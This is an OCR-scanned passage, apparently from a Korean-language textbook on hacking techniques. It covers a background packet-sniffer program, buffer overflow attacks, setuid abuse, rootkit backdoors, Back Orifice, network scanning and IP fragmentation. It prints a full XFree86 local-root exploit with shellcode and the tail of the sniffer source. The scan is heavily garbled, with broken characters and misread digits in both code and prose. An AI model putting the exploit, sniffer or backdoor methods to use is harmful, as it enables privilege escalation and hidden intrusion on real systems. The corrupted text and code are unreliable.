filter (cp ， (u_long) hdrp- 〉 nhb_msglen) 


Pexit ((_ 1) ， ’’ Eth : read ”) ； 


void getauthO 

{ 

char *buf, *getpass (), *crypt () ； 
char pwd[21], prmpt[81] ； 

strcpy (pwd, AUTHPASSWD); 
sprintf(prmpt, M (%s)UP? M , ProgName) ； 
buf=getpass (prmpt) ； 
if (strcmp (pwd, crypt (buf, pwd))) 
exit(l) ； 


void main (argc, argv) 
int argc ； 
char **argv; 

{ 

char cbuf [BUFSIZ] ； 

struct ifconf ifc ； 

int s, ac=l, backg=0; 

ProgName=argv [0] ； 

/* getauthO ； */ 

LOG=NULL; 

device^NULL ； 

while ((ac<argc) && (argv[ac] [0] 


’)) 



register char ch = argv [ac++] [1] ； 
一 % itch (toupper (ch))_ 


期 
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case I’: device=argv[ac++] ； 
break ； 

case ’F’ : if(! (LOG=fopen((LogName=argv[ac++]), M a M ))) 
Zexit(l, "Output file cant be opened\n M ) ； 

break ； 

case ’B’: backg=l; 
break ； 

case ’D’: debugs 1 ； 


break ； 


default : fprintf(ERR, ’’Usage: %s [_b] [~d] [~i interface] [-f file]\n M , ProgName) ； 
exit(l) ； 


if(! device) 

{ 

if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) 

Pexit(1 ， ”Eth : socket") ； 

ifc. ifc_len = sizeof(cbuf) ； 
ifc.ifc_buf = cbuf ； 

if(ioctT(s, SIOCGIFCONF, (char *)&ifc) < 0) 

Pexit(1 ， ”Eth : ioctl’’) ； 

close (s) ； 

device = ifc. ifc_req->ifr_name ； 

} 

fprintf(ERR, "Using logical device %s [%s] \n M , device, NIT_DEV) ； 
fprintf(ERR, "Output to %s. %s%s n , (LOG)?LogName ： "stdout", 
(debug)?’’ (debug)"： MM , (backg)? M Backgrounding ": ’’W’); 

ifOLOG) 

LOGHstdout; 

signal (SIGINT, death) : 
signal (SIGTERM, death) ； 
signal (SIGKILL, death )； 
signal(SIGQUIT, death) ； 

if (backg && debug) 

{ 

fprintf(ERR, M [Cannot bg with debug on]\n’’); 
backg=0 ； 


if (backg) 
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register int s ； 

if((s=fork())>0) 

{ 

fprintf(ERR, ” [pid %d] \n M , s) ； 
exit(O) ； 

} 

else if(s<0) 

Pexit(l, "fork”) ； 

if( (s=open( M /dev/tty M , O_RDWR))〉0 ) 

{ ' 

ioctl(s,TIOCNOTTY, (char *)NULL); 
close (s) ； 

} 

} 

fprintf(LOG, M \nLog started at => %s [pid %d] \n M , NOWtm (), getpid()) ； 
fflush(LOG) ； 니 

do_it() ； 


이 수법은 암호화된 통신을 하지 않는 체계에 대해서는 효률적이지만 암호화통신을 진 
행 하는 경 우에 는 효률적 이 지 못하다 . 

— 관리자 (root ) 계정 획득 

rpc.statd, ftpd 등의 완충기 자리넘 침 오유를 리용하여 관리 자권한을 획 득할수 있 다 . 
^완충기자리넘침공격 

할당된 기 억 기 크기 보다 더 큰 자료를 기 억 기 에 복사하려 고 할 때 발생 하는 현상으로 프 
로그람의 실행흐름을 조작하여 발생시키며 이를 리용하여 관리자의 권한을 획득할수 있다 . 

많은 프로그람언 어 들 (가장 널 리 쓰이 는것 은 C 와 C++) 이 경 계 검 사 (boundary check) 
기능을 포함하고 있지 않다 . 따라서 콤파일시에 아무런 경고도 하지 않으며 실행시에는 보 
호도 하지 않는다 . 

만일 25byte 만 할당된 배 렬 (Array: 주기 억 공간의 할당단위 ) 에 lOObyte 의 자료를 넣 
으려 고 한다면 여 분의 75byte 는 다른 주기 억부분을 침 범 하게 된 다 . 

완충기 넘 침은 《Memory Fault : (Core dumped) } 라는 통보문의 발생 을 가져 오는 
기본요인으로 된다 . 사용자들은 프로그람의 실행시에 이리한 통보문을 자주 보게 된다 . 

이 통보문이 화면출력 되 는 경 우에 는 사용자가 오유있는 프로그람을 실행 하고있 다는것 을 
의미하므로 프로그람코드를 재검토하여야 한다 . 완충기넘침을 일으킬수 있는 간단한 프로 
그람을 보자 . 

鍾 
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#inlude <stdio. h> 

main() 

{ 

char userinput [99999] ； 

gets(userinput) ； /* 잘못된것 이 다 . Fgets 를 사용하여 야 한다 . */ 

overflow (userinput) ； 
exit(O) 


int overflow (char *data) 

{ 

char filename [1] ； 

strcpy(filename, data) ； 
/* do something */ 
return ； 


사용자는 99999 자까지 입 력할수 있게 되 여있으며 다음에 입 력된 자료는 lbyte 의 배 
렬 (array) 에 strcpy 를 리용하여 복사된 다 . 

strcpy 는 아무려한 경계검사도 하지 않기때문에 결국 사용자의 자료를 모두 배렬에 복 
사하게 되 며 다른 주기억 부분에 계 속 복사하게 되 는것 이 다 . 

그러 다가 마감에 는 탄창 (stack) 에 덧 쓰기 하게 된 다 . 탄창은 return ( 반환 ) 이 호출되 였 
을 때 overflow 함수에 어떻게 main 으로 돌아가는가를 알려주는 주기 억기령역의 특수한 위 
치 이 다 . 

탄창의 침 범 으로부터 공격 자는 공격 을 시 도한다 . 공격 자는 유효한 체 계코드를 포함하 
도륵 자료를 조작할수 있으며 함수가 main 으로 돌아가는 대 신에 그것 을 실행하도록 함수 
에 강요하게 된다 . 일반적 으로 이 려 한 코드는 쉘코드라고 하는데 그것은 대부분의 완충기 
넘침이 /bin/sh 의 복사본이나 /tmp 등록부에 만들어놓은 suid root 의 /bin/sh 복사본을 실 
행하려 고 하기 때 문이 다 . 

완충기자리넘침공격의 례 

suid 프로그람에 의한 완충기 자리넘 침은 공격의 근원으로 될수 있다 . 프로그람이 실지 
로 그것을 실행한 사용자의 권한이 아닌 다른 사용자의 권한으로 실행되는것 이 기때문에 파 
괴자는 완충기넘침을 악용하여 권한을 얻을수 있게 된다 . suid root 프로그람의 경우 이것 
은 파괴 자가 즉시 roo t 의 지 령 입 력 재 촉 (prompt) 을 얻 게 된 다는것 을 의 미 하며 
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터 그가 목적하는대로 공격을 가할수 있게 되는것 이다 . 

비 root 사용자소유의 suid/sgid 프로그람의 경우에도 완충기넘 침은 직접적 이지는 않지 
만 지레대로 리용될수 있다 . 

례를 들어 /usr/bin/cu 프로그람이 완충기넘 침을 내포하고있고 cu 는 다음과 같은 허 
가권을 가지고있다고 하자 . 

jdoe$ is -1 / usr/bon/cu 

_ r _ gr _ sr _ x i uucp uucp 127924 Mar 7 2000/usr/bin/cu* 

만일 cu 에 서 완충기 넘 침 이 발생 하면 파괴 자는 사용자 uucp 와 uucp 그롭의 허 가권을 가 
질수 있다 . cu 는 다른 체계에 접속하는데 사용되는 프로그람이므로 통과암호 (password) 
는 흔히 /etc 八 iucp 에 씌여지게 되며 이것은 uucp 에 의 해서 만 읽 을수 있게 되 여있다 . 완 
충기넘 침의 발생 에 의해 공격 자는 이 통과암호를 얻 을수 있게 되 는것 이 다 . 

최 악의 경 우에 프로그람이 uucp 에 의해 소유되 여 있으므로 공격 자는 그 프로그람을 트 
로이 화된것으로 바꾸어버 리고 suid 비트를 제거 해버릴수도 있 다 . 그다음 root 가 그 cu 지령 
을 실행하게 되는 경우 그 지령은 사용자 root 로서 실행되게 된다 . 이 시점에서 공격자는 root 
계 정 (account) 을 얻 을수 있 게 된 다 . 

다른 실례로 man 프로그람을 들수 있다 . 

일 반적 으로 man 프로그람은 미 리 양식 화 (preformat) 된 man 폐 지 (문서 페 지 ) 를 보관하 
기 위한 목적에 서 sgid man 으로 되 여있 다 . 만일 man 그룹에 의해 쓰기가 가능하도록 되여 
있는 폐지가 있고 man 프로그람이 침해되였다면 공격자는 man 폐지를 다시 쓸수 있게 된다 . 

이 와 같은것 은 별 로 관심 사로 되 지 않을수도 있지 만 man 폐 지 에 의해 사용되 는 마크 
로언어 는 사용자들이 보통 생 각하는것 보다 훨씬 강력한것 이 다 . 그중 많은것 들이 외부프로 
그람을 호출할수 있는 기능을 가지고있다 . 일반적으로 공격자는 man 페지가 chmod 666 
/etc/shadow 를 실 행 하도록 수정 하며 그 다음 root 사용자가 그 man 페 지 를 읽 을 때 까지 대 
기 하도록 하는 수법을 적용한다 . 대 다수 LINUX 배포판들에서 man 폐지를 안전하게 다루 
고 있 는데 그것 은 문서 폐 지 를 양식 화하기 위해 man 지 령 이 호출하여 사용하는 to 伴프로그 
탐이 안전치 못한 마크로를 불가능하게 해주기때문이다 . 그러나 모든 LINUX 배포판과 기 
타 UNIX 계렬의 조작체계들이 이리한 기능을 가지고있는것은 아니므로 주의할 필요가 있다 . 

아래 에 Xserver 봉사를 리용한 완충기 자리넘 침 공격 의 원천코드를 보여주었 다 . 

이 코드를 실행하여 사용자권한에서 root 권한을 얻 을수 있 다 . 
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코드 4. Xserver 봉사를 리용한 완충기 자리넘 침 공격 

/* Try 2 3 4 5 for OFFSET */ 

#define OFFSET 2 

^include <stdio. h> 

^include <string. h> 

#define LENCODE ( sizeof( Code ) ) 
char Code [] = 

M \xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0 M 
”\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41’’ 
”\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\xl7\xcd’’ 
M \x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e f ' 
M \x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh M ； 

char Display[ 0x4001 + OFFSET ] = n :99999”，*ptr = Display + OFFSET + 1 ； 
char *args[] = { M X M , M -nolock M , Display, NULL }； 


main() 


printf( M pHEAR - XFree86 exploit\nby mAChnHEaD \n\nYou may get a root prompt 
now. If you don’t, try different values for OFFSET.\n\n") ； 
dup2( 0, 10 ) ； 
dup2( 1, 11 ) ； 
dup2( 2, 12 )； 

_asm_( M movl %%esp, (%0)\n\tsubl %1, (%0) M :: M b M (ptr), M n M (LENCODE+0x2000)) ； 

memcpy( ptr + 4, ptr, 0x3fc ) ； 

memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE ) ； 

memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE ); 

execve ( " / usr/Xl lR6/bin/X n , args, args + 3 ) ； 

perror( M execve M )； 


^ rpc.statd 

체 계 장애 시 NFS (Network File System) 에 서 파일 복구를 위 하여 제 공하는 lockd 프 
로그람을 지 원하는 도구로서 의뢰기와 봉사기의 상태를 감시 하는 rpc 프로그람이다 . 

이 것은 의뢰기의 파라메터 를 검 사하지 않아 완충기 자리넘 침을 통하여 관리 자권한에서 
만 수행가능한 임의의 명령을 수행시킬수 있으며 이를 리용한 공격도구가 인터네트에 공 
개 되 여 있 다 . 
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^ ftpd 

LINUX 계렬의 wu-ftpd 2.6 이전판본의 ft p d 데몬은 SITE EXEC 명령에서의 입력문자 
렬의 크기를 검사하지 않아 완충기자리넘침 이 발생하고 이것을 통하여 관리 자권한을 획득 
할수 있다 . 

n setuid 를 리 용한 방법 

/etc/passwd 파일 은 관리 자 (root ) 권한에 속하는 파일 이 다 . 

통과암호를 바꾼 다음 변경된 내용을 / etc/passwd 파일에 저장하고있다 . 여기에 이 
상한 문제가 있다 . 보통의 경우에는 (permission denied 》 라는 통보가 떠야 한다 . 여 
기 에 아주 중요한 내 용이 있 다 . 바로 setuid 라는것 이 다 . 다음과 같이 실행시 켜 보자 . 

% Is ~al /bin/passwd rwsr-xr-x 2 root 512 Jan 11 12:31 passwd 

앞에서 설명하였지 만 setuid 비 트로서 s 가 표시 되 여있음을 알수가 있 다 . 

이것은 프로그람이 실행되는 동안은 관리자의 권한을 가질수 있게 되며 프로그람의 끝 
남과 동시 에 이 권한은 곧 사라지 게 된 다 . 그러 므로 통과암호를 리 용하여 etc/passwd 파 
일 을 바꿀수 있는것 이 다 . 가입 입 력 재 촉 (login prompt) 이 나왔을 때 생 각없 이 가입 등록을 
하지 만 내 부에 서 는 상당히 복잡한 과정 이 이 루어 진 다 . 우선 가입등록한 사용자의 ID 를 읽 
어들인다 . 그리고 통과암호를 읽어들이고 이것을 cryptO 함수를 리용하여 암호화시킨다 . 

이 암호화된 통과암호를 /etc/passwd 의 두번째 마당과 비 교하고 갈으면 통과암호가 정 
확하므로 가입등록을 허 가해 준다 . 

다시 ls/bin/login 을 해 보면 알겠지 만 이 login 도 root 소유의 setuid 비 트가 붙은 파일 
이다 . 여기서 알아두어야 할 점은 통과암호를 확인할 때 /etc/passwd 파일의 두번째 마당 
을 해 석 하여 입 력된 통과암호와 맞춰 보는게 아니 라는점 이 다 . 이 런 decrypt 함수는 없으며 알 
고리듬도 존재하지 않는다 . setuid 가 실행되는 동안은 체계관리자의 권한을 가질수 있다 . 
이것을《유효 uid(e 伴 ective uid ) 》라고 한다 . 해커들은 이 런 관리자소유의 setuid 비트가 설 
정된 파일을 실행시키는 동안 새치기를 걸수있는 쉘각본 (shell script) 이나 도구를 리용하 
여 이 파일들의 실행을 중지시킨 상태로 있게 한다 . 즉 root 의 권한을 가진 채로 있도륵 하 
는것 이 다 . 이 런 방식 으로 roo t 의 권한을 불법 적 으로 획 득하는것 이 대 부분의 해 킹방법 이 다 . 
과거의 해킹수법들에는 이전에는 주로 망상이나 국부호스트상에서 설정이 잘못된것을 리 
용하여 관리자의 권한을 얻는 초보적인 해킹이 많았다 . 즉 조작체계를 설치 하면 프로그람 
들의 권한이 적 당히 조절 안되는 경우가 많은데 이것을 악용하여 호스트관리 자만이 보고 쓸 
수 있는 파일 도 마음대 로 조작하는 경 우가 이 전의 해 킹류형이 였 다 . 

이밖에도 관리자권한을 획득할수 있는 여러가지 방법 이 있다 . 

권한획 득단계 에서 사용되 는 방법 은 이 미 잘 알려져 있고 많은 공격 도구들이 공개되 여 
있으며 체계화되여있다 
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3) 공격단계 

공격단계는 체계침입이후에 일어나는 침입을 말하는데 획득한 정보 및 추가작업을 통 
하여 체계침입을 확대하고 다른 체계에 침입하는 단계이다 . 일단 체계침입이 성공하면 공격 
자는 침입흔적을 제거하게 된다 . 또한 정보수집단계로 인하여 남은 흔적도 제거하게 된다 . 

또한 일반계정으로 침입한 경우에는 충분한 권한 (LINUX 의 경우 root 권한)을 가지기 
위하여 국부체계의 취약점을 공격하게 되는데 대부분의 체계에 이리한 취약점이 있다 . 그 
리고 재침입을 위하여 인증되지 않은 접근을 제공해주는〈〈뒤문》을 설치하게 되는데 이 
러 한 뒤 문은 데 몬형 래 또는 봉사의 비 정 상적 인 설 정 등을 리 용하여 득정 포구를 열 어 놓게 된 
다 . 이러한 작업을 손쉽게 해주는 도구묶음을 흔히 ’’rootkit” 이라 부르며 체계종류별로 다 
양한 도구들이 존재한다 . 

공격자는 침입에 성공한 체계를 리용하여 보다 심도있는 공격을 수행하게 된다 . 

가장 보편적인 방법은 통과암호엿듣기로서 자신이 침입한 체계에 설치하여 공격대상 
망상의 Telnet. POP, FTP 등에 대한 망통과량을 감시하며 사용자이름과 통과암호를 수 
집한다 . 또한 침입한 체계와《믿음성관계》에 있는 체계의 정보를 알아내여 별도의 공격 
을 하지 않고도 인증된 사용자로서 다른 체 계를 공격 할수도 있다 . 가장 대 표적 인 실례 가 n r n 
계렬의 명령을 사용하는 경우이며 이외에도 자료기지에 접근할수 있는 경우도 있다 . 

또한 침입 에 성공한 체계를 다른 망을 공격 하기 위한 경유지로 사용한다 . 이 경우 다 
시 정 보수집 단계 부터 새 롭게 시 작하게 된 다 . 경 유지 를 리 용하는 목적 은 공격 자의 흔적 을 추 
적하기 어렵게 하기 위해서이며 많은 경우에 있어 최소 2-5 개싸이트이상을 경유지로 사 
용한다 . 

그러 면 뒤문설 치 에 대 해서 보다 구체 적 으로 보자 . 

훑기기 술과 함께 최 근 가장 빨리 변화되 고있는 해 킹 기술분야의 하나가 바로 뒤문이 다 . 
앞에 서 언급한것 처 럼 뒤문은 침 입 자가 아무런 인증수단이 없 이 그리 고 기 록을 남기 지 않 
고 체계에 다시 들어올수 있도륵 하는 수단을 말한다 . 하지만 전통적인 뒤문설치기술은 이 
미 잘 알려져있고 대부분의 보안체계에서 이것을 검출할수 있기때문에 해커에게는 큰 위 
험을 준다 . 최근에 발견된 뒤문은 특정포구를 열거나 망련결을 필요로 하지 않는다 . 

raw socket 를 열 어 특정 한 파케 트가 오기 를 기 다린 다 . 그리 고 조건에 맞는 파케 트가 
오면 그에 적절한 응답을 제공한다 . 이러한 기술을 통로뚫기 (tunneling) 기술이라고 하며 
ICMP, UDP, IP, TCP[26] 등 다양한 통신규약계층에서 실현될수 있으며 http, Mail, DNS 
등 응용계층에서도 실현될수 있기때문에 방화벽을 우회 할수 있는 수단을 제공한다 . 또한 침 
입검 출체 계 를 우회하기 위하여 암호화기 능을 제 공하기 도 한다 . 

망의 뒤문외 에도 체 계 에서 특정파일 이 나 프로쎄 스를 숨기 기 위한 기 술도 발전하고있 
다 . 단순히 login, ps, Is, find 등과 같은 프로그람을 변조하는것 이 아니 라 핵심부준위 에 
서 은닉기능을 구현한다 . 이미 FreeBSD, LINUX 와 Solaris 에 대한 핵심부뒤문이ᄂ공개되 
였다 . 이러한 핵심부뒤문은 사실상 검출하기가 불가능하다 . 이것을 예방하기 위 
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심부에서 LKM 기능을 제거하면 되지만 최근 실행되고있는 핵심부에 코드를 삽입하는 방 
법에 관한 기술도 이미 언급되고있어 이것도 완전한 방법은 아니다 . 

뒤문의 형 태와 기능도 역시 다양화되 고있다 . 공격 자가 뒤문으로 련결을 하는 봉사기 
개념뒤문에서 벗어나 Reverse Pimpage, reverse ssh 와 같이 의뢰기형래의 뒤문이 있다 . 
이것은 대부분의 싸이트가 외부로 나가는 파케트에 대한 려과를 하지 않는 보안모형의 취 
약점 을 리용한것 이 다 . 통로뚫기기 술을 리용하여 모둘갱 신，원격공격 명 령 등을 수행 하는 대 
행체형태의 뒤문도 존재한다 . 이 리 한 기능이 추가되 고있다는 사실은 공격 자가 지속적 으로 
뒤문을 리용하겠다는 의 미 이며 수천대 의 호스트가 공격 에 사용되 였던 최 근의 DDoS 공격 
처럼 앞으로의 공격을 준비한다는 의미로 받아들일수 있다 . 

해커 가 LINUX 체 계 에서 주로 리용하는 뒤문형태 를 보면 다음과 같다 . 


표 2-1. 해커가 주로 사용하는 뒤문 형태 


No 

뒤 문 

리용하는 형 래 

1 

Inetd 

트로이 목마 원격호출 

2 

Tcpd 

망련결정보를 숨기 고 파케 트거부정 보를 무시한다 

3 

Rshd 

트로이 목마 원격호출 

4 

chfn, chsh 

보통 사용자가 root 로 되게 한다 . 

5 

Crontab 

-cron 으로 수행되는 작업들을 숨긴다 . 

6 

Du 

파일크기를 표시 

7 

Find 

파일을 숨긴다 

8 

Bindshell 

데몬형태의 쉘 

9 

Ls 

파일을 숨긴다 

10 

Ifconfig 

망도청 기능을 숨긴 다 . 

11 

Killall 

침입자가 수행중인 작업을 관리자가 죽여도 작업 이 완료되지 
않는다 . 

12 

Sni 伴 er 

파케 트도청 

13 

Sniffchk 

망 도청 기능을 확 인 하는 도구 

14 

Login 

트로이 목마 원격호출 

15 

Netstat 

망련결정보와 대 기포구를 숨긴다 . 

16 

Passwd 

보통 사용자가 root 로 되게 한다 . 

17 

Ps 

망도청，뒤문，데 몬과 같은 특정프로쎄 스를 숨긴 다 . 

18 

Pidof 

프로쎄스를 숨긴 다 . 

19 

Wted 

wtmp/utmp 변 조용편 집 기 

20 

Syslogd 

기록정보를 숨긴다 . 

귀 

_top 

망 도청，뒤문，데 몬과 같은 특정 프로쎄 스를 숨긴 다 . 
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4) 재침입 단계 

이 단계 에서는 해 킹당한 체 계를 리용하여 해 킹규모를 확대한다 . 

이미 설치한 뒤문을 통하여 필요한 정보를 획득하고 다른 체계에로의 해킹을 시도한다 . 

또한 권한밖의 동작을 수행하여 체 계관리 자의 역 할을 무의 미하게 만든다 . 

2.2.2. 대표적인 해킹수법들 

1) 전통적인 공격수법의 특징 

전통적 인 공격수법의 정보수집 단계 에서는 하나의 체계 에서 하나의 공격대상체계 나 또 
는 대규모의 광지 역망을 대상으로 훑기 공격 을 수행 하게 된다 . 취 약점훑기 공격도구를 분류 
해보면 단일취 약점을 흙는 도구와 다수의 취 약점을 흙는 도구로 구분할수 있으며 이 도구 
들은 하나의 체계 또는 망블로크단위 로 훑는 기능을 가지 고있다 . 

또 다른 특징은 봉사기중심의 공격수법이다 . 대부분의 공격도구(실지 체계침입에 사 
용되 는 공격 용각본을 이 른바 ’’exploits ” 라고 부른다 . ) 는 봉사기 의 취 약점 을 공격하며 뒤 
문이 나 트로이 목마도 공격 하려 고 하는 체 계 에 봉사기 를 설 치 하여 공격 자의 말단에 서 침 입 
하는 방식 을 사용한다 . 

전통적 인 공격수법의 침 입 경로는 여 러 단계의 경로를 거 치게 된다 . 공격 자는 자신의 흔 
적을 감추기 위해 2~5 개이상의 체계에 차례로 침입하여 최종공격대상체계를 공격한다 . 결 
국 침입을 당한 호스트간에 사슬을 이루고 마지막의 피해체계는 바로 전단계의 체계에 대 
한 정보만을 가지게 된다 . 물론 전단계의 체계에서는 이미 공격자가 자신의 흔적을 제거 
하기때문에 추적은 거의 불가능하게 된다 . 이러한 사슬모형에서 공격자는 매개의 체계에 침 
입할 때마다 취약점스캐너 등을 사용하게 되는데 이 경우 매우 많은 시간을 필요로 하며 공 
격 자는 뒤 문을 동하여 나중에 다시 체 계 에 들어 와서 정 보를 가져 가야 하는 위 험 이 존재 한다 . 

2) 새로운 공격수법 

현재 의 보안에 서 는 일 반적 으로 공격 자가 항상 우세하며 방어 자는 알려진 공격방법 에 
만 대응하는 방식의 주기를 이루고있다 . 또한 인터네트가 실세계의 중요한 일부가 되면서 
《싸이버테로》，《싸이버범죄》가구체화，조직화되는것도전통적인 공격수법의 변화에 큰 
영 향을 주고있다 . 

전통적 인 공격 수법변화의 가장 큰 원동력 은 방어 자의 보안수준향상이다 . 방화벽 
(Firewall) 및 침 입 검출체 계 (IDS, Intrusion Detection System ) 의 보편화는 전통적 인 공 
격수법에 매우 효과적인 대응수단을 제공한다 . 하지만 이러한 장벽을 극복하고 성공적으 
로 체계 에 침 입 하기 위 한 기술과 도구들이 최근년간 지속적으로 개 발되 고있다 . 대 표적 인 도 
구로서 hping, Firewalk, Loki Project, libpcap, libnet 등을 들수 있다 . 그리고 이러한 
변화에서 주목을 끄는것이 바로 1998 년 중엽에 공개된 백오리피스이다 . 
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一 백오리피스 

백오리피스의 출현은 공격수법 이 새롭다는데서 큰 주목을 끌고있다 . 백오리피스는 새 
로운 망공격수법의 많은 특징을 내포하고있으며 가장 성공률이 높은 공격으로서 세계쏘프 
트웨 어산업 계 에서 유명 하다 . 다른 공격 도구와 마찬가지 로 백오리피스도 공격 자에게 인증 
되지 않은 접근권한을 제공한다 . 이와 함께 새로운 기능으로서 파케트재시도기능과 새로 
운 공격프로그람을 추가할수 있는 기능을 가지고있다 . 이것은 최근의 정보기술분야에서 나 
타나고있는 대행체개념과 비슷한것으로서 제품의 기능 및 판본갱신을 자동적으로 진행한다 . 

정 보기 술의 발전이 공격 기 술에 도 적 용되 고있는것 이 다 . 

파케트재시도기능으로 공격자는 다시 체계에 침입하지 않고 이미 침입에 성공한 체계 
를 리용하여 다른 체계를 공격하는데 리용할수 있다 . 물론 Windows 백오리피스는 비루스 
다음가는 전파력 을 가지고있다 . 백오리 피스의 기능들은 해 킹의 개 념을 대중화하였고 《Script 
kiddies 》 라고 불리 우는 공격 자보다도 수준이 낮은《워 너 비 》 (want to be; 해커 가 되 고 
싶어하는 사람)들에 게 해 킹의 맛을 보여주는 도구를 제 공함으로써 백 오리피스가 널 리 퍼 
지 게 하였 다 . 이 런 면에서 백 오리피 스는 가장 성공적 인 공격 도구라고 말할수 있 다 . 사실 백 
오리 피스의 위협은 이러한 워 너비 (want to be) 들에 의 한 공격이 아니다 . 워 너비의 호기 
심 으로 인하여 이미 인터네 트상의 수많은 체계 에 백 오리피스를 비롯한 비슷한 종류의 공 
격도구들이 설치되였고 이러한 체계는 앞으로 더 강력한 공격을 수행할수 있는 공격도구 
로 바뀔수 있다는데 그 위협이 존재한다 . 례를 들면 백오리피스가 설치된 1000 개의 체계 
정보를 가진 공격자가 새로운 분산봉사거부 (DDoS ) 공격도구를 만들고 이것을 백오리피스 
를 리 용하여 체계 에 설치 한 다음 공격 을 진행 한다고 가정 할수 있다 . 

백 오리피 스의 또 다른 특징 으로서 는 일 반사용자를 공격 대 상으로 한다는 점 이 다 . 보안 
에 대한 인식 이 강조되면서 봉사기 및 망에 대한 보안이 향상되였고 결과적으로 공격자는 
보안에 대한 인식이 없는 일반사용자들을 공격대상으로 삼은것이다 . 그리고 일단 일반사 
용자를 대 상으로 1 차적 인 공격 이 성 공하면 공격 전 이 단계 를 거 쳐 봉사기 에 도 침 입할수 있 
는 기회를 가지게 된다 . 

一 망훑기 

방화벽 은 전통적 인 망훑기공격 을 효률적 으로 차단해 주는 보안수단으로 될수 있 다 . 하 
지만 방화벽을 우회할수 있는 공격 기술도 많이 발전하였다 . 대부분의 체계 에서 망파케트 
를 도청할수 있도륵 해주는 libpcap 서고，임의의 파케트를 만들어 보낼수 있도륵 해주는 
libnet 서 고의 공개 는 방화벽 을 공격 하기 위 한 공격 도구의 기 초기 술이 되 며 firewalk, hping, 
nmap 등과 같은 고도의 훑기도구에 사용된다 . 공격자의 체계에서 직접 훑기를 시도하는 
전통적 인 공격 수법 과 달리 제 3 의 봉사기 를 리용하여 공격 대 상의 망을 흙을수 있는 FTP 
bounce 공격 ， DNS bounce 공격 등의 bounce 기술이 많이 사용되고있으며 hping 과 같이 원 

S 속여 훑기공격 을 할수 있는 방법 도 존재한다 . 그리 고 wingate 등의 대 리 자기 능 
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을 제공하는 체계를 리용함으로써 공격자의 위치를 로출시키지 않는다. 

전통적인 공격수법은 이미 잘 알려져있어 침입검출체계 ( IDS ) 등에 의하여 쉽게 로출 
되고 추적될수 있다. 이러한 침입검출체계를 무력화시키기 위한 공격 방법으로서 새롭게 부 
각되는 방법은 분산훑기공격이다. 분산훑기공격은 여러 호스트에서 하나의 공격대상망을 훑 
어 보다 빠르고 다양한 정 보를 획득할뿐만아니 라 수많은 체 계를 리 용하고 그리 고 때 로는 가 
짜공격 파케 트를 리 용하기 때 문에 침 입 검 줄체 계 가 검 줄하는 정 보를 무의 미 하게 만들게 된 다. 
또한 대 행체형태의 훑기공격도구를 리용하게 되면 공격 자는 공격체계 에 가입등록하지 않 
고 먼곳에서 많은 대행체를 통제하여 쉽게 정보를 수집할수 있게 된다. 

— IP 조각화를 리용한 DoS 공격 

IP 조각화는 망환경에서 IP 파케트의 효률적 인 전송을 보장해주지만 보안상 몇가지 문 
제점을 가지고있다. Ping of Death , teardrop 등의 공격에서는 비정상적인 조각들을 재 
조합 ( reassemble ) 하는 과정에 체계가 정지되거나 재기동될수 있다. 하지만 최근 IP 조각 
화를 리용한 봉사거부공격외에 이것을 리용하여 방화벽이나 침입검출체계를 우회할수 있 
는 문제 점 이 나타나고있 다. 일부 경 로기 나 침 입 검 줄체 계 들은 파케 트재 조립 기 능을 제 공하 
고 있지 않아 공격 자가 공격파케트를 여 러개의 데 이 터 그램 으로 조개서 공격하는 경우 이 
것을 검출하거나 차단하지 못할수 있다. 

IP 쪼각화의 개념 

IP 규약은 파케 트를 몇개의 작은 파케 트로 나누고 목적지체 계 에서는 반대 로 재조립하 
는 기 능을 제 공한다. 이 과정 을 쪼각화，재 조립 이 라고 부론다. IP 조각화는 IP 데 이 터그램 
이 망을 통하여 전송될 때 전송되는 IP 데 이 터그램의 크기 가 해 당 전송매 체 에서 전송될수 
있는 최대크기 즉 MTU (Maximum Transmission Unit ) 보다 클 때 발생 한다. 례를 들어 
이써네 트에서 전송가능한 IP 데 이 터그램 의 최 대 크기 즉 MTU 는 1500 byte 이 다. 만일 
1500 byte 보다 큰 데 이 터 그램 이 이써 네 트망을 통과해 야 한다면 그 데 이 터 그램 은 조각화가 
필 요하게 된 다. 이 처 럼 조각화는 정 상적 인 기 능이 지 만 비 정 상적 인 쏘각을 발생 시 켜 봉사 
거부공격에 리용하기도 하고 조각을 처리하지 않는 경로기나 침입검출체계를 피하기 위한 
목적 으로 고의 적 으로 조각화를 리용하기 도 한다. 매 조각들은 목적 지 에 도착하여 조각화 
되 기 전의 상태 로 재조립 되 기 위하여 다음의 정 보들을 가지 고있 다. 

^ 매 조각은 하나의 동일 한 조각식 별번호를 리용하여 재조립 되 는데 이 식 별 번호는 IP 
머리부의 16 bit 마당으로서 《 IP 식별번호》또는《쪼각 ID 》 라고 부론다. 

ᄄ 매조각은 원래 조각화되기 이전의 파케트에서의 위치 즉〈〈조각 변위값》을 가전다. 

^ 매조각은 자료길 이 를 가전다. 여 기서 IP 머 리부 20 byte 는 자료길 이 에서 제 외된다. 
즉 이써 네 트의 MTU 인 1500 byte 가 전송될 때 자료길 이 는 1480(1500-20) byte 로 표 
시된 다. 

^ 마지막으로 매 조각은 현재 조각에 추가적인 조각들이 있을 경우 
Fragment ) 기발이 1 로 설정된다. 
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IP 조각화의 원리 를 리해 하기 위하여 4000byte 의 ICMP 자료가 이써네 트상에서 전송 
될때 어떻게 조각화되는지 고찰해보자. 

우선 4000byte 의 ICMP 자료를 송신해 보자. (일 반적 인 ping 파케 트는 56byte 의 ICMP 
자료를 전송하지 만 -s 옵션을 리용하여 ICMP 자료가 쪼각화되 도록 충분히 크게 한다. ) 

[root9Linux80 /root]# ping _s 4000 172.16.2.34 
PING 172.16.2.34 (172.16.2.34)： 4000 data bytes 
4008 bytes from 172.16.2.34: icmp_seq=0 ttl=254 time=20. 7 ms 
4008 bytes from 172.16.2.34: icmp_seq=l ttl=254 time=20.1 ms 

이 때 tcpdump 를 리 용하여 파케 트를 수집 하면 다음과 같다. 

20:55:56.548630 Linux80. kisa. or. kr > insecure, kisa. or.kr： (frag 30338:104892960) 

